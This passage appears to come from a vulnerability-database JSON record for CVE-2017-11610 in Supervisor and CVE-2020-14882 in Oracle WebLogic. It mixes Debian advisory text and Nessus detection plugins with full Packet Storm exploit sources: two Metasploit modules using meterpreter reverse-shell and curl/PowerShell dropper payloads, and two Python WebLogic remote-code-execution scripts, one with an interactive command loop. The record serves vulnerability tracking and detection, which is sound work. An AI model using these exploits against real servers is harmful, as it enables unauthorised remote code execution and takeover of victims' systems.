namespaces. Plugins that use\na single namespace will continue to work as before. Details can be found\non the upstream issue at\nhttps://github.com/Supervisor/supervisor/issues/964 .\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 3.0r1-1+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.3.1-1+deb9u1.\n\nWe recommend that you upgrade your supervisor packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-13T19:45:15", "type": "debian", "title": "[SECURITY] [DSA 3942-1] supervisor security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11610"], "modified": "2017-08-13T19:45:15", "id": "DEBIAN:DSA-3942-1:4585A", "href": "https://lists.debian.org/debian-security-announce/2017/msg00203.html", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-09-26T01:52:27", "description": "", "cvss3": {}, "published": "2017-09-25T00:00:00", "type": "packetstorm", "title": "Supervisor XML-RPC Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2017-09-25T00:00:00", "id": "PACKETSTORM:144316", "href": "https://packetstormsecurity.com/files/144316/Supervisor-XML-RPC-Authenticated-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Supervisor XML-RPC Authenticated Remote Code Execution\", \n'Description' => %q{ \nThis module exploits a vulnerability in the Supervisor process control software, where an authenticated client \ncan send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. \nThe commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this \nmay be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been \nconfigured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Calum Hutton <c.e.hutton@gmx.com>' \n], \n'References' => \n[ \n['URL', 'https://github.com/Supervisor/supervisor/issues/964'], \n['URL', 'https://www.debian.org/security/2017/dsa-3942'], \n['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], \n['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], \n['CVE', '2017-11610'] \n], \n'Platform' => 'linux', \n'Targets' => \n[ \n['3.0a1-3.3.2', {}] \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => \n{ \n'RPORT' => 9001, \n'Payload' => 'linux/x64/meterpreter/reverse_tcp', \n}, \n'Privileged' => false, \n'DisclosureDate' => 'Jul 19 2017', \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(9001), \nOptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), \nOptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), \nOptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), \n] \n) \nend \n \ndef check_version(version) \nif version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') \nreturn true \nelse \nreturn false \nend \nend \n \ndef check \n \nprint_status('Extracting version from web interface..') \n \nparams = { \n'method' => 'GET', \n'uri' => normalize_uri('/') \n} \nif !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? \nprint_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\") \nparams.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) \nend \nres = send_request_cgi(params) \n \nif res \nif res.code == 200 \nmatch = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/) \nif match \nversion = Gem::Version.new(match[1]) \nif check_version(version) \nprint_good(\"Vulnerable version found: #{version}\") \nreturn Exploit::CheckCode::Appears \nelse \nprint_bad(\"Version #{version} is not vulnerable\") \nreturn Exploit::CheckCode::Safe \nend \nelse \nprint_bad('Could not extract version number from web interface') \nreturn Exploit::CheckCode::Unknown \nend \nelsif res.code == 401 \nprint_bad(\"Authentication failed: #{res.code} response\") \nreturn Exploit::CheckCode::Safe \nelse \nprint_bad(\"Unexpected HTTP code: #{res.code} response\") \nreturn Exploit::CheckCode::Unknown \nend \nelse \nprint_bad('Error connecting to web interface') \nreturn Exploit::CheckCode::Unknown \nend \n \nend \n \ndef execute_command(cmd, opts = {}) \n \n# XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server \n# Credit to the following urls for the os.system() payload \n# https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 \n# https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html \nxml_payload = %{<?xml version=\"1.0\"?> \n<methodCall> \n<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> \n<params> \n<param> \n<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string> \n</param> \n</params> \n</methodCall>} \n \n# Send the XML-RPC payload via POST to the specified endpoint \nendpoint_path = target_uri.path \nprint_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\") \n \nparams = { \n'method' => 'POST', \n'uri' => normalize_uri(endpoint_path), \n'ctype' => 'text/xml', \n'headers' => {'Accept' => 'text/xml'}, \n'data' => xml_payload, \n'encode_params' => false \n} \nif !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? \nprint_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\") \nparams.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) \nend \nreturn send_request_cgi(params, timeout=5) \n \nend \n \ndef exploit \n \nres = execute_cmdstager(:linemax => 800) \n \nif res \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\") \nelsif res.code == 404 \nfail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\") \nelse \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\") \nend \nelse \nprint_good('Request returned without status code, usually indicates success. Passing to handler..') \nhandler \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144316/supervisor_xmlrpc_exec.rb.txt"}, {"lastseen": "2021-01-26T14:38:53", "description": "", "cvss3": {}, "published": "2021-01-26T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server 12.2.1.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2021-01-26T00:00:00", "id": "PACKETSTORM:161128", "href": "https://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) \n# Google Dork: inurl:\\\\\\\"/console/login/LoginForm.jsp\\\\\\\" \n# Date: 25/1/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html \n# Version: Oracle WebLogic Server, version 12.2.1.0 \n# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux) \n# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html \n# CVE : CVE-2020-14882 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md \n \n#!/usr/bin/python3 \n \nimport requests \nimport argparse \nimport http.client \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = \\\\\\'HTTP/1.0\\\\\\' \n \nparse = argparse.ArgumentParser() \nparse.add_argument(\\\\\\'-u\\\\\\', \\\\\\'--url\\\\\\', help=\\\\\\'url\\\\\\') \nargs = parse.parse_args() \n \nproxies = {\\\\\\'http\\\\\\' : \\\\\\'127.0.0.1:8080\\\\\\'} \ncmd_ = \\\\\\\"\\\\\\\" \n \n# Headers \nheaders = { \n\\\\\\\"User-Agent\\\\\\\": \\\\\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\\\\\", \n\\\\\\\"Accept\\\\\\\": \\\\\\\"application/json, text/plain, */*\\\\\\\", \n\\\\\\\"Accept-Language\\\\\\\": \\\\\\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\\\\\", \n\\\\\\\"Accept-Encoding\\\\\\\": \\\\\\\"gzip, deflate\\\\\\\", \n\\\\\\\"Upgrade-Insecure-Requests\\\\\\\": \\\\\\\"1\\\\\\\", \n\\\\\\\"Content-Type\\\\\\\": \\\\\\\"application/x-www-form-urlencoded\\\\\\\", \n\\\\\\\"Cache-Control\\\\\\\": \\\\\\\"max-age=0\\\\\\\", \n\\\\\\\"Connection\\\\\\\": \\\\\\\"close\\\\\\\" \n} \n \n# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: \nurl = args.url + \\\\\\\"\\\\\\\"\\\\\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\\\\\"java.lang.Runtime.getRuntime().exec();\\\\\\\");\\\\\\\"\\\\\\\"\\\\\\\" \nurl_ = args.url + \\\\\\\"/console/images/%252E%252E%252Fconsole.portal\\\\\\\" \n \nform_data_ = \\\\\\\"\\\\\\\"\\\\\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\\\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); \nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); \njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\\\\\"connectionHandler\\\\\\\"); \nfield.setAccessible(true); \nObject obj = field.get(adapter); \nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\\\\\"getServletRequest\\\\\\\").invoke(obj); \nString cmd = req.getHeader(\\\\\\\"cmd\\\\\\\"); \nString[] cmds = System.getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"window\\\\\\\") ? new String[]{\\\\\\\"cmd.exe\\\\\\\", \\\\\\\"/c\\\\\\\", cmd} : new String[]{\\\\\\\"/bin/sh\\\\\\\", \\\\\\\"-c\\\\\\\", cmd}; \nif (cmd != null) { \nString result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\A\\\\\\\").next(); \nweblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\\\\\"getResponse\\\\\\\").invoke(req); \nres.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); \nres.getServletOutputStream().flush(); \nres.getWriter().write(\\\\\\\"\\\\\\\"); \n}executeThread.interrupt(); \n\\\\\\\");\\\\\\\"\\\\\\\"\\\\\\\" \n \n#data_ = parse.urlencode(form_data_) \nresults1 = requests.get(url, headers=headers) \n \nif results1.status_code == 200: \nprint(\\\\\\\"(Load Headers... \\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(Data urlencode... \\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(Execute exploit... \\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\\\\\n\\\\\\\") \nwhile True: \ncmd_test = input(\\\\\\\"(CHackA0101GNU/Linux)$ \\\\\\\") \nif cmd_test == \\\\\\\"exit\\\\\\\": \nbreak \nelse: \ntry: \ncmd_ = cmd_test \nheaders = { \n\\\\\\'cmd\\\\\\': cmd_, \n\\\\\\'Content-Type\\\\\\': \\\\\\'application/x-www-form-urlencoded\\\\\\', \n\\\\\\'User-Agent\\\\\\': \\\\\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\\\\', \n\\\\\\'Accept\\\\\\': \\\\\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\\\\', \n\\\\\\'Connection\\\\\\': \\\\\\'close\\\\\\', \n\\\\\\'Accept-Encoding\\\\\\': \\\\\\'gzip, deflate\\\\\\', \n\\\\\\'Content-Length\\\\\\': \\\\\\'1244\\\\\\', \n\\\\\\'Content-Type\\\\\\': \\\\\\'application/x-www-form-urlencoded\\\\\\' \n} \nresults_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text \nprint(results_) \nexcept: \npass \nelse: \nprint(\\\\\\\"(CHackA0101GNU/Linux)$ Fail.\\\\\\\\n\\\\\\\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161128/oraclews12210-exec.txt"}, {"lastseen": "2020-10-29T14:58:28", "description": "", "cvss3": {}, "published": "2020-10-29T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2020-10-29T00:00:00", "id": "PACKETSTORM:159769", "href": "https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request \n# Exploit Author: Nguyen Jang \n# CVE: CVE-2020-14882 \n# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html \n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html \n \n# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf \n \nimport requests \nimport sys \n \nfrom urllib3.exceptions import InsecureRequestWarning \n \nif len(sys.argv) != 3: \nprint(\"[+] WebLogic Unauthenticated RCE via GET request\") \nprint(\"[+] Usage : python3 exploit.py http(s)://target:7001 command\") \nprint(\"[+] Example1 : python3 exploit.py http(s)://target:7001 \\\"nslookup your_Domain\\\"\") \nprint(\"[+] Example2 : python3 exploit.py http(s)://target:7001 \\\"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\\\"\") \nexit() \n \ntarget = sys.argv[1] \ncommand = sys.argv[2] \n \nrequest = requests.session() \nheaders = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'} \n \nprint(\"[+] Sending GET Request ....\") \n \nGET_Request = request.get(target + \"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec('\" + command + \"');\\\");\", verify=False, headers=headers) \n \nprint(\"[+] Done !!\") \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159769/oraclewls-exec.txt"}, {"lastseen": "2020-11-19T15:59:29", "description": "", "cvss3": {}, "published": "2020-11-19T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Administration Console Handle Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883"], "modified": "2020-11-19T00:00:00", "id": "PACKETSTORM:160143", "href": "https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic Server Administration Console Handle RCE', \n'Description' => %q{ \nThis module exploits a path traversal and a Java class instantiation \nin the handle implementation of WebLogic's Administration Console to \nexecute code as the WebLogic user. \n \nVersions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and \n14.1.1.0.0 are known to be affected. \n \nTested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. \n \nWarning! Multiple sessions may be created by exploiting this vuln. \n}, \n'Author' => [ \n'voidfyoo', # Discovery \n'Jang', # Analysis and PoC \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-14882'], # Auth bypass? \n['CVE', '2020-14883'], # RCE? \n['CVE', '2020-14750'], # Patch bypass \n['EDB', '48971'], # An exploit \n['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], \n['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf'] \n], \n'DisclosureDate' => '2020-10-20', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux', 'win'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n} \n], \n[ \n'PowerShell Stager', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n} \n] \n], \n'DefaultTarget' => 4, \n'DefaultOptions' => { \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(7001), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = execute_command('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n \nif res.code == 200 && res.body.include?('Deploying Application') \nraise RuntimeError \nend \n \nunless res.code == 302 && res.body.include?('UnexpectedExceptionPage') \nreturn CheckCode::Safe('Path traversal failed.') \nend \n \nCheckCode::Vulnerable('Path traversal successful.') \nrescue RuntimeError \nvprint_error('Application is deploying, sleeping and retrying check') \n \nsleep(1) \nretry \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd, :win_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper, :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") unless cmd.empty? \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => aperture_science_handheld_portal_device, \n'vars_post' => { \n'handle' => coherence_gadget_chain(cmd) \n} \n) \nend \n \ndef coherence_gadget_chain(cmd) \n<<~JAVA.tr(\"\\n\", '').gsub(' ', '') \ncom.tangosol.coherence.mvel2.sh.ShellSession(' \njava.lang.Runtime.getRuntime().exec( \nnew java.lang.String[] { \n#{win_target? ? '\"cmd.exe\", \"/c\", ' : '\"/bin/sh\", \"-c\", '} \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n} \n) \n') \nJAVA \nend \n \ndef aperture_science_handheld_portal_device \nnormalize_uri(target_uri.path, '/console/css/.%252e/console.portal') \nend \n \ndef win_target? \ntarget.platform.names.first == 'Windows' \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160143/weblogic_admin_handle_rce.rb.txt"}], "nessus": [{"lastseen": "2023-05-18T14:17:50", "description": "Calum Hutton reported that the XML-RPC server in supervisor, a system for controlling process state, does not perform validation on requested XML-RPC methods, allowing an authenticated client to send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup entirely. supervisord will now only call methods on the object registered to handle XML-RPC requests and not any child objects it may contain, possibly breaking existing setups. No publicly available plugins are currently known that use nested namespaces. Plugins that use a single namespace will continue to work as before. Details can be found on the upstream issue at https://github.com/Supervisor/supervisor/issues/964 .", "cvss3": {}, "published": "2017-08-14T00:00:00", "type": "nessus", "title": "Debian DSA-3942-1 : supervisor - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:supervisor", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3942.NASL", "href": "https://www.tenable.com/plugins/nessus/102449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3942. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102449);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"DSA\", value:\"3942\");\n\n script_name(english:\"Debian DSA-3942-1 : supervisor - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Calum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on\nrequested XML-RPC methods, allowing an authenticated client to send a\nmalicious XML-RPC request to supervisord that will run arbitrary shell\ncommands on the server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly available\nplugins are currently known that use nested namespaces. Plugins that\nuse a single namespace will continue to work as before. Details can be\nfound on the upstream issue at\nhttps://github.com/Supervisor/supervisor/issues/964 .\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=870187\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://github.com/Supervisor/supervisor/issues/964\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/supervisor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/supervisor\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2017/dsa-3942\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the supervisor packages.\n\nFor the oldstable distribution (jessie), this problem has been fixed\nin version 3.0r1-1+deb8u1.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 3.3.1-1+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Supervisor XML-RPC Authenticated Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:supervisor\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"supervisor\", reference:\"3.0r1-1+deb8u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"supervisor\", reference:\"3.3.1-1+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"supervisor-doc\", reference:\"3.3.1-1+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:17:15", "description": "Security fix for CVE-2017-11610\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-08-08T00:00:00", "type": "nessus", "title": "Fedora 26 : supervisor (2017-307eab89e1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:supervisor", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-307EAB89E1.NASL", "href": "https://www.tenable.com/plugins/nessus/102246", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-307eab89e1.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102246);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"FEDORA\", value:\"2017-307eab89e1\");\n\n script_name(english:\"Fedora 26 : supervisor 